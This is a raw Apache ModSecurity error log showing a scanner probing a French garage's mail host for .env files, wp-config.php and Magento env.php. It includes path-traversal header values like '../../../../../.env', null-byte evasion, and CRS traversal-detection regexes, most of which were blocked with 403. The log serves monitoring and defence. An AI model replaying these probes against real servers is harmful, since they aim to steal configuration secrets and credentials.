[Tue May 12 05:22:12.237221 2026] [security2:error] [pid 1808852:tid 1808858] [client 45.148.10.238:29836] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKc5BfeipD4uoG21Fou1AAAAAM"]
[Tue May 12 05:22:12.237379 2026] [security2:error] [pid 1808852:tid 1808858] [client 45.148.10.238:29836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKc5BfeipD4uoG21Fou1AAAAAM"]
[Tue May 12 05:22:12.280978 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.238:54144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1BfeipD4uoG21FousgAAABI"]
[Tue May 12 05:22:12.934414 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.238:29878] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc5Nr1yOh9TvizezidkQAAAFI"]
[Tue May 12 05:22:12.934493 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.238:29878] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc5Nr1yOh9TvizezidkQAAAFI"]
[Tue May 12 05:22:12.934529 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.238:29878] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc5Nr1yOh9TvizezidkQAAAFI"]
[Tue May 12 05:22:12.950506 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.238:29878] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc5Nr1yOh9TvizezidkQAAAFI"]
[Tue May 12 05:22:13.004245 2026] [:error] [pid 1808852:tid 1808879] [client 20.226.81.141:42894] File does not exist: /home/cpcentre/public_html/albin.php
[Tue May 12 05:22:15.103263 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.238:54258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc2Rs7kySIUZ3ORnIkdAAAAQY"]
[Tue May 12 05:22:16.236601 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.238:21984] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.dev"] [unique_id "agKc6BfeipD4uoG21Fou4gAAABc"]
[Tue May 12 05:22:16.236771 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.238:21984] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.dev"] [unique_id "agKc6BfeipD4uoG21Fou4gAAABc"]
[Tue May 12 05:22:16.242817 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.238:22002] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc6PaAnTZtx1_H_wy1RQAAAVc"]
[Tue May 12 05:22:16.242883 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.238:22002] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc6PaAnTZtx1_H_wy1RQAAAVc"]
[Tue May 12 05:22:16.242929 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.238:22002] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc6PaAnTZtx1_H_wy1RQAAAVc"]
[Tue May 12 05:22:16.243124 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.238:22002] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc6PaAnTZtx1_H_wy1RQAAAVc"]
[Tue May 12 05:22:16.243189 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.238:22002] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc6PaAnTZtx1_H_wy1RQAAAVc"]
[Tue May 12 05:22:16.243226 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.238:22002] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc6PaAnTZtx1_H_wy1RQAAAVc"]
[Tue May 12 05:22:16.243608 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.238:22002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc6PaAnTZtx1_H_wy1RQAAAVc"]
[Tue May 12 05:22:16.245650 2026] [access_compat:error] [pid 1825179:tid 1825213] [client 45.148.10.238:22024] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:22:18.925611 2026] [:error] [pid 1808852:tid 1808879] [client 20.226.81.141:42894] File does not exist: /home/cpcentre/public_html/file.php
[Tue May 12 05:22:19.452217 2026] [security2:error] [pid 1825287:tid 1825318] [client 45.148.10.238:22030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.example"] [unique_id "agKc6wgpmE1yW0glLdgsTAAAAM0"]
[Tue May 12 05:22:19.452419 2026] [security2:error] [pid 1825287:tid 1825318] [client 45.148.10.238:22030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.example"] [unique_id "agKc6wgpmE1yW0glLdgsTAAAAM0"]
[Tue May 12 05:22:20.454511 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.238:22062] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc7M1tk6y7yBJLpJo4CgAAAIg"]
[Tue May 12 05:22:20.454575 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.238:22062] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc7M1tk6y7yBJLpJo4CgAAAIg"]
[Tue May 12 05:22:20.454605 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.238:22062] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc7M1tk6y7yBJLpJo4CgAAAIg"]
[Tue May 12 05:22:20.454814 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.238:22062] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc7M1tk6y7yBJLpJo4CgAAAIg"]
[Tue May 12 05:22:20.454865 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.238:22062] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc7M1tk6y7yBJLpJo4CgAAAIg"]
[Tue May 12 05:22:20.454919 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.238:22062] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc7M1tk6y7yBJLpJo4CgAAAIg"]
[Tue May 12 05:22:20.455346 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.238:22062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc7M1tk6y7yBJLpJo4CgAAAIg"]
[Tue May 12 05:22:20.459313 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.238:22072] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKc7PaAnTZtx1_H_wy1SAAAAUM"]
[Tue May 12 05:22:20.459470 2026] [security2:error] [pid 1844863:tid 1844872] [client 45.148.10.238:22072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKc7PaAnTZtx1_H_wy1SAAAAUM"]
[Tue May 12 05:22:20.462915 2026] [security2:error] [pid 1825287:tid 1825321] [client 45.148.10.238:22036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc7AgpmE1yW0glLdgsTQAAANA"]
[Tue May 12 05:22:20.463094 2026] [security2:error] [pid 1825287:tid 1825321] [client 45.148.10.238:22036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc7AgpmE1yW0glLdgsTQAAANA"]
[Tue May 12 05:22:21.509753 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.238:54290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc2QgpmE1yW0glLdgsMQAAANE"]
[Tue May 12 05:22:22.051154 2026] [security2:error] [pid 1808852:tid 1808876] [client 45.148.10.238:54066] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc1xfeipD4uoG21FouuwAAABU"]
[Tue May 12 05:22:22.173877 2026] [security2:error] [pid 1825179:tid 1825217] [client 45.148.10.238:54194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc2dr1yOh9TvizezideQAAAFM"]
[Tue May 12 05:22:23.457273 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.238:22096] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/app/.env"] [unique_id "agKc781tk6y7yBJLpJo4CwAAAIE"]
[Tue May 12 05:22:23.457469 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.238:22096] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/.env"] [unique_id "agKc781tk6y7yBJLpJo4CwAAAIE"]
[Tue May 12 05:22:23.976295 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:22112] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc79r1yOh9TvizezidnQAAAE0"]
